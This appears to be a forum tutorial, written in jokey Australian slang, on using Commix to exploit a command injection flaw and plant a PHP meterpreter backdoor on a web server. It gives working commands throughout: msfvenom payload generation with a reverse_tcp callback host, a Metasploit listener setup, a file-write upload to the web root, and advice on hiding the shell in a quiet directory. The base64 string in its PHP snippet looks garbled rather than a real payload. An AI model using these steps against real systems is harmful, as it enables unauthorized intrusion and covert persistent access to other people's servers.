For uploadin' a PHP Backdoor, we're gonna use Commix (Command Injection Exploiter), and with this ripper tool, it's a piece of cake to find and take advantage of a command injection vulnerability in a certain dodgy parameter or string. Commix is written in the Python programming language, ya beauty!
INSTALLATION FOR KALI LINUX:
- Install Commix, following this command:
Code: Select all
sudo apt-get install commix -y- So once ya got Commix installed, you can give the target site a good ol' test for any command injection vulnerabilities by running the following dinky little command:
Code: Select all
commix -u http://<SERVER-IP>/authg?c=whoami- Commix'll give the URL ya provided a good ol' check for any sneaky command injection vulnerabilities. If it finds one, it'll ask if ya want a ripper pseudo-terminal shell. For this beaut example, I gotta say yes and Commix'll hook ya up with the pseudo shell, as you can see below:
Code: Select all
commix(os_shell) > ls
bin boot dev etc home lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var
commix(os_shell) >This can be a real ripper for sneakin' in and gettin' stuff done on the target system on the down-low.
UPLOAD A PHP BACKDOOR WI' COMMIX
So, seein' as that target server's runnin' the ol' LAMP stack, we can whip up a PHP meterpreter payload and upload it to the web server as a sneaky backdoor with Commix. Then we can use that to get into the target system whenever we need to.
-- 1 -- The first step's gonna be generating the PHP meterpreter payload with Msfvenom. You can do that by running the following command:
Code: Select all
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=1234 -e php/base64 -f raw > shell.php-- 2 -- Once ya got that payload sorted, ya gotta tweak it a bit by addin' the ol' PHP tags so the script runs proper-like, for example:
Code: Select all
<?php
eval(base64_decode(mQINBFRUAGoBEACuk6ze2V2pZtScf1U25N2CX19AeL7sVYwnyrTYuWdG2FmJx4xDLTLVUazp2AEmJhskulL7VCZPyg7ynfo20Tu96zUD7p0rnQA2k3Dz7dKHHh.eEsI5EZyFy1XodhUnEIjel2nGe6f1OO7Dr3UIEQw5JnkZyqMcbLCu9sM2twFyfaa8JNghfjltLJs3UjJ8ZnGGByMmWxrWQUItMpQjGr99nZf4L));
?>-- 3 -- Now set up the listener with Metasploit:
Code: Select all
msfconsole
msf> use multi/handler
msf> set payload php/meterpreter/reverse_tcp
msf> set LHOST <KALI-IP>
msf> set LPORT <PORT>
msf> run-- 4 -- The next step's gonna be uploading that PHP shell we just whipped up to the web server. You can do that with Commix by running the following command:
Code: Select all
commix -u http://<SERVER-IP>/authg?c=id --file-write=’/home/kali/Desktop/shell.php’ --file-dest=’/var/www/html/shell.php-- 5 -- In this case, we'll be chuckin' the "shell.php" file up on the root of the web server. Now, it's recommended to put it in a directory that doesn't get too much foot traffic.
If the "shell.php" file gets uploaded without any dramas, you should get a message sayin' it was a success.
-- 6 -- We can snag a meterpreter session on the target by headin' over to the "shell.php" file on the web server. Just punch in the following URL into ya browser:
Code: Select all
http://<SERVER-IP>/shell.php-- 7 -- 'avin' a crack at that PHP code through the ol' web browser should do the trick and give ya a nice little meterpreter session on your listener